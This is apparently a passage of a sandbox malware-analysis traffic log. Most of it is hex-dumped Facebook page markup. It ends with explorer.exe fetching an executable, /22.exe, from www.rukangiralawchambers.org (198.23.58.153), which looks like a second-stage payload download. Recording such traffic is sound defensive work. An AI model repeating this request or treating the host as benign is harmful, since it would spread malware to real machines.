                                                                                                                Data Ascii: v>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_b_54\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information about online adve
                                                                                                                2022-10-13 11:08:02 UTC3850INData Raw: 26 61 6d 70 3b 68 3d 41 54 33 38 4d 32 6a 4c 6f 41 30 68 4b 76 5f 42 72 4a 52 61 37 64 49 43 73 31 30 36 70 4d 70 7a 63 73 76 58 79 35 42 33 70 63 31 30 45 62 56 47 68 35 48 35 76 77 50 2d 45 68 46 68 6b 75 41 54 4b 64 4a 44 39 58 74 38 42 48 7a 53 30 59 6b 2d 37 66 70 52 32 6c 46 4e 47 70 48 6d 57 4f 32 62 73 42 50 48 65 50 64 54 6b 32 6e 39 66 33 41 32 69 78 73 7a 71 74 34 2d 59 46 55 6a 53 6a 64 7a 63 67 4b 4b 76 4e 74 72 43 4e 6b 62 50 65 4d 4b 35 65 32 59 36 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44
                                                                                                                Data Ascii: &amp;h=AT38M2jLoA0hKv_BrJRa7dICs106pMpzcsvXy5B3pc10EbVGh5H5vwP-EhFhkuATKdJD9Xt8BHzS0Yk-7fpR2lFNGpHmWO2bsBPHePdTk2n9f3A2ixszqt4-YFUjSjdzcgKKvNtrCNkbPeMK5e2Y6A\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">European Interactive D
                                                                                                                2022-10-13 11:08:02 UTC3851INData Raw: 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 79 6f 75 72 6f 6e 6c 69 6e 65 63 68 6f 69 63 65 73 2e 63 6f 6d 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 78 34 46 74 6e 6e 33 45 31
                                                                                                                Data Ascii: " rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT0x4Ftnn3E1
                                                                                                                2022-10-13 11:08:02 UTC3853INData Raw: 75 20 68 61 76 65 20 64 69 73 61 62 6c 65 64 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 2e 20 50 6c 65 61 73 65 20 62 65 20 61 77 61 72 65 20 74 68 61 74 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 64 69 73 74 69 6e 63 74 20 66 72 6f 6d 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 74 68 61 74 20 46 61 63 65 62 6f 6f 6b 20 6f 66 66 65 72 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 67 6f 6f 67
                                                                                                                Data Ascii: u have disabled browser cookies. Please be aware that these controls are distinct from the controls that Facebook offers.\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.goog
                                                                                                                2022-10-13 11:08:02 UTC3854INData Raw: 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 67 75 69 64 65 5c 75 30 30 32 35 32 46 73 61 66 61 72 69 5c 75 30 30 32 35 32 46 73 66 72 69 31 31 34 37 31 5c 75 30 30 32 35 32 46 6d 61 63 26 61 6d 70 3b 68 3d 41 54 33 33 78 65 69 46 68 4d 61 63 47 4b 70 6d 44 38 53 61 73 56 53 32 58 43 48 7a 32 69 70 56 57 78 39 77 50 4b 70 49 43 43 48 52 4c 6c 55 78 58 2d 39 45 68 34 4a 76 7a 70 67 75 75 75 53 52 72 76 6e 59 68 43 4c 65 42 49 6c 4f 74 71 38 37 66 6e
                                                                                                                Data Ascii: li>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-ie\u00252Fguide\u00252Fsafari\u00252Fsfri11471\u00252Fmac&amp;h=AT33xeiFhMacGKpmD8SasVS2XCHz2ipVWx9wPKpICCHRLlUxX-9Eh4JvzpguuuSRrvnYhCLeBIlOtq87fn
                                                                                                                2022-10-13 11:08:02 UTC3856INData Raw: 65 73 73 65 6e 74 69 61 6c 5f 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 64 5f 43 56 5c 22 3e 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 78 6f 37 20 5f 34 6a 79 33 20 5f 34 6a 79 31 20 73
                                                                                                                Data Ascii: essential_button\" data-testid=\"cookie-policy-manage-dialog-accept-button\" title=\"Only allow essential cookies\" type=\"submit\" id=\"u_0_d_CV\">Only allow essential cookies\u003C\/button>\u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9xo7 _4jy3 _4jy1 s
                                                                                                                2022-10-13 11:08:02 UTC3857INData Raw: 30 37 39 5f 30 5f 67 5f 68 50 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 75 6f 6d 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 5c 2f 63 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 76 65 6e 73 6b 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 4f 31 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 54 35 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 75 6c 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30
                                                                                                                Data Ascii: 079_0_g_hP",{"__html":"Suomi"},1],["__markup_3310c079_0_h_\/c",{"__html":"Svenska"},1],["__markup_3310c079_0_i_O1",{"__html":"Ti\u1ebfng Vi\u1ec7t"},1],["__markup_3310c079_0_j_T5",{"__html":"T\u00fcrk\u00e7e"},1],["__markup_3310c079_0_k_ul",{"__html":"\u0
                                                                                                                2022-10-13 11:08:02 UTC3859INData Raw: 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 57 4a 22 2c 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 6a 4d 22 2c 22 75 5f 30 5f 37 5f 52 6d 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 55 51 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 63 4c 22 2c 22 75 5f 30 5f 38 5f 2b 5a 22 2c 33 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 55 51 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 75 75 22 2c 22 75 5f 30 5f 39 5f 33 31 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 55 51 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f
                                                                                                                Data Ascii: ],["__elem_45d73b5d_0_2_WJ","loginbutton",1],["__elem_1de146dc_0_0_jM","u_0_7_Rm",1,"__markup_9f5fac15_0_0_UQ"],["__elem_ec77afbd_0_0_cL","u_0_8_+Z",3,"__markup_9f5fac15_0_0_UQ"],["__elem_a588f507_0_5_uu","u_0_9_31",1,"__markup_9f5fac15_0_0_UQ"],["__elem_
                                                                                                                2022-10-13 11:08:02 UTC3860INData Raw: 31 64 61 35 0d 0a 62 56 69 72 74 75 61 6c 43 75 72 73 6f 72 43 6c 69 63 6b 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 49 71 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 49 71 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d
                                                                                                                Data Ascii: 1da5bVirtualCursorClickLogger","init",["__elem_a588f507_0_0_Iq"],[[{"__m":"__elem_a588f507_0_0_Iq"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]
                                                                                                                2022-10-13 11:08:02 UTC3861INData Raw: 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 46 6f 63 75 73 4c 69 73 74 65 6e 65 72 22 5d 2c 5b 22 46 6c 69 70 44 69 72 65 63 74 69 6f 6e 4f 6e 4b 65 79 70 72 65 73 73 22 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a 22 70 61 73 73 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 22 69 6e 69 74 54 6f 67 67 6c 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 39 34 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 2b 56 22 2c 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 5c 2f 42 22 5d 2c 5b 7b 22 5f
                                                                                                                Data Ascii: ll":""}]],["FocusListener"],["FlipDirectionOnKeypress"],["BrowserPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":"pass"}]],["LoginFormToggle","initToggle",["__elem_a588f507_0_3_94","__elem_a588f507_0_4_+V","__elem_70b16c69_0_0_\/B"],[{"_
                                                                                                                2022-10-13 11:08:02 UTC3863INData Raw: 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 62 65 67 69 6e 5f 70 6f 6c 6c 69 6e 67 5f 6c 6f 67 69 6e 5f 63 6f 6f 6b 69 65 73 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 64 73 5c 2f 6d 61 6e 61 67 65 72 5c 2f 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 2f 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70 2e 6e 6f 77 26 26 70 2e 74 69 6d 69 6e 67
                                                                                                                Data Ascii: imeSlice)})});});onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script><script>now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing
                                                                                                                2022-10-13 11:08:02 UTC3864INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 69 37 4d 35 34 2f 79 4b 2f 6c 2f 65 6e 5f 55 53 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 33 6e 48 67 69 61 52 77 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 67 2f 72 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e
                                                                                                                Data Ascii: <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="3nHgiaRw" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.
                                                                                                                2022-10-13 11:08:02 UTC3866INData Raw: 73 73 2f 35 5f 37 36 65 70 64 6f 6e 4e 75 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 7a 2f 6c 2f 30 2c 63 72 6f 73 73 2f 68 50 54 73 51 50 4b 33 32 38 58 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f
                                                                                                                Data Ascii: ss/5_76epdonNu.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/hPTsQPK328X.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><script>window.__bigPipeCto
                                                                                                                2022-10-13 11:08:02 UTC3867INData Raw: 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 73 65 74 50 61 67 65 49 44 28 22 37 31 35 33 39 35 32 31 34 32 38 31 39 31 32 39 37 31 38 22 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 32 32 39 32 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 33 6e 48 67 69 61 52 77 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c
                                                                                                                Data Ascii: equireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7153952142819129718")});</script>2292<script nonce="3nHgiaRw">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();<
                                                                                                                2022-10-13 11:08:02 UTC3868INData Raw: 46 6f 43 48 39 51 64 31 45 54 51 55 50 34 74 41 6a 56 58 2d 6c 67 74 7a 79 34 4d 48 30 35 6f 61 70 4c 36 4e 36 63 71 4a 36 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 36 39 39 33 30 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 47 32 73 59 75 4d 6d 42 7a 4c 42 32 30 45 43 68 35 42 45 72 69 62 6b 62 7a 30 37 46 51 43 71 5a 47 7a 68 74 6e 6a 62 4c 48 47 72 59 70 4b 6b 47 73 79 30 58 33 54 71 62 54 38 55 63 34 43 4b 70 76 47 4c 41 47 5a 36 45 53 75 45 37 68 4e 49 6e 6d 78 34 4b 52 43 58 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 47 32 73 59 75 4d 6d 42 7a 4c 42 32 30 45 43 68 35
                                                                                                                Data Ascii: FoCH9Qd1ETQUP4tAjVX-lgtzy4MH05oapL6N6cqJ6A"]},-1],["cr:1069930",[],{__rc:[null,"Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2G2sYuMmBzLB20ECh5
                                                                                                                2022-10-13 11:08:02 UTC3870INData Raw: 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 5a 38 46 33 6a 55 65 4e 77 4a 38 36 39 79 4a 53 57 50 66 58 66 31 62 54 63 39 6d 48 42 46 5f 4d 41 38 33 59 48 36 49 52 51 75 78 72 45 73 65 38 6f 37 68 39 65 58 65 62 36 6e 52 4a 63 49 4d 44 63 61 37 49 36 77 4d 4b 39 4f 34 79 58 6c 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67
                                                                                                                Data Ascii: k"]},-1],["cr:1105154",[],{__rc:[null,"Aa3Z8F3jUeNwJ869yJSWPfXf1bTc9mHBF_MA83YH6IRQuxrEse8o7h9eXeb6nRJcIMDca7I6wMK9O4yXlg"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,g
                                                                                                                2022-10-13 11:08:02 UTC3871INData Raw: 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 2c 22 41 61 30 69 41 4f 58 69 6a 76 6e 45 33 51 36 4b 44 4e 7a 79 76 30 65 77 63 55 63 37 6e 73 6e 55 46 73 33 34 31 75 72 52 7a 65 47 49 74 57 4a 36 4e 43 63 32 47 79 41 67 32 39 70 47 4e 57 51 70 4c 62 55 6c 4b 6b 57 49 57 4d 59 76 69 58 47 68 38 52 33 5a 32 74 47 47 38 69 54 7a 54 54 59 6c 39 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 5a 38 46 33 6a 55 65 4e 77 4a 38 36 39 79 4a 53 57 50 66 58 66 31 62 54 63 39 6d 48 42 46 5f 4d 41 38 33 59 48 36 49 52 51 75 78 72 45 73 65 38 6f 37 68 39 65 58 65 62 36 6e 52 4a 63 49 4d 44
                                                                                                                Data Ascii: ctDOM.classic.prod"],{__rc:["ReactDOM.classic.prod","Aa0iAOXijvnE3Q6KDNzyv0ewcUc7nsnUFs341urRzeGItWJ6NCc2GyAg29pGNWQpLbUlKkWIWMYviXGh8R3Z2tGG8iTzTTYl9Q"]},-1],["cr:983844",[],{__rc:[null,"Aa3Z8F3jUeNwJ869yJSWPfXf1bTc9mHBF_MA83YH6IRQuxrEse8o7h9eXeb6nRJcIMD
                                                                                                                2022-10-13 11:08:02 UTC3873INData Raw: 73 4c 6f 67 67 65 72 42 6c 75 65 22 2c 22 41 61 32 47 32 73 59 75 4d 6d 42 7a 4c 42 32 30 45 43 68 35 42 45 72 69 62 6b 62 7a 30 37 46 51 43 71 5a 47 7a 68 74 6e 6a 62 4c 48 47 72 59 70 4b 6b 47 73 79 30 58 33 54 71 62 54 38 55 63 34 43 4b 70 76 47 4c 41 47 5a 36 45 53 75 45 37 68 4e 49 6e 6d 78 34 4b 52 43 58 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 47 32 73 59 75 4d 6d 42 7a 4c 42 32 30 45 43 68 35 42 45 72 69 62 6b 62 7a 30 37 46 51 43 71 5a 47 7a 68 74 6e 6a 62 4c 48 47 72 59 70 4b 6b 47 73 79 30 58 33 54 71 62 54 38 55 63 34 43 4b 70 76 47 4c 41 47 5a 36 45 53 75 45 37 68
                                                                                                                Data Ascii: sLoggerBlue","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7h
                                                                                                                2022-10-13 11:08:02 UTC3874INData Raw: 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 6b 76 46 48 59 78 4c 31 39 6d 39 6a 73 46 6c 4e 4b 59 4c 48 67 39 42 4f 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69
                                                                                                                Data Ascii: ","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","kvFHYxL19m9jsFlNKYLHg9BO",63072000000,"/",true,false,true]],["DeferredCooki


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                4192.168.2.549718198.23.58.153443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:08 UTC3876OUTGET /22.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: www.rukangiralawchambers.org
                                                                                                                2022-10-13 11:08:09 UTC3876INHTTP/1.1 200 OK
